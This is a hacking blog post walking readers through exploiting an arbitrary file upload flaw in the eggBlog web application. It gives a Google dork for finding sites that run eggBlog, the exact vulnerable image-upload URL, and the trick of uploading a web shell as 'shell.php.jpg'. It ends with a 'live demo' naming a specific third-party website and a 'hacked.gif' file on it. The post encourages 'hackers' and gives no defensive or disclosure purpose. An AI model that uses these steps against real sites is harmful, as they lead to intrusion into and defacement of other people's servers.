Menu
 
» » » » eggBlog Arbitrary File Upload Vulnerability

A+ A-
So here is a new eggBlog Vulnerability that allow user to upload arbitrary files (if you know what i mean ha ha :) ).
lets get into it.
Hack Using Shell Upload
Go to google type powered by eggBlog.net in search box.
Google Dork:"powered by eggBlog.net"
You will get a list of search result now choose a link(like shown below)

Select any url (http://xyz.com/[path])and replace it with this one
http://xyz.com/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

Hack Using Shell Upload
now all you have to do now is upload you file(shell/whatever you like )
and access it with this kina url.

http://server/[path]/photos/uploads/shell.php.jpg

Live demo:
  • http://www.websitesbyblake.com/

  • http://www.websitesbyblake.com/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

  • http://www.websitesbyblake.com/photos/uploads/hacked.gif

    So All the best hackers :)
    • Posted by
    Labels: , ,

    Share to:

    at 8:42 PM

    Post a Comment

    Feel Free To Ask Your Query we Love To Answer

    Subscribe to: Post Comments (Atom)
     
    Top